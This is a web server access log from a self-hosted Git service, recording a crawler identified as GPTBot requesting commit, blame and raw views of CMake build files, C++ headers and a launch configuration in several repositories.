"https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:14:54:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18920] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build" +[17/Feb/2026:14:54:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10486] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp" +[17/Feb/2026:14:54:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/.vscode/launch.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.vscode/launch.json" +[17/Feb/2026:14:54:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/.vscode/launch.json" +[17/Feb/2026:14:54:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/.vscode/launch.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.vscode/launch.json" +[17/Feb/2026:14:54:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/.vscode/launch.json" +[17/Feb/2026:14:54:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18909] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" +[17/Feb/2026:14:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10197] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp" +[17/Feb/2026:14:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10711] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp" +[17/Feb/2026:14:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18908] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" +[17/Feb/2026:14:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10777] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" +[17/Feb/2026:14:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16183] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" +[17/Feb/2026:14:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10933] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" +[17/Feb/2026:14:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25010] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:14:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10148] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:14:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10204] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:14:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:14:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 20673] [Gzip 14.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:14:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:14:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12511] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:14:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 20677] [Gzip 14.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:14:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11822] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11188] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29807] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11160] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:54:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11267] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:54:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11095] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:54:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14635] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:54:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14293] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:54:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10409] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:14:54:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:14:54:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:14:54:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:54:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9948] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:54:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10173] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:54:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39738] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:54:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:54:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:54:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9957] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:54:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14307] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:54:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:14:54:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11019] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10070] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:14:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:14:54:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:54:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:14:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10018] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:54:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:54:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 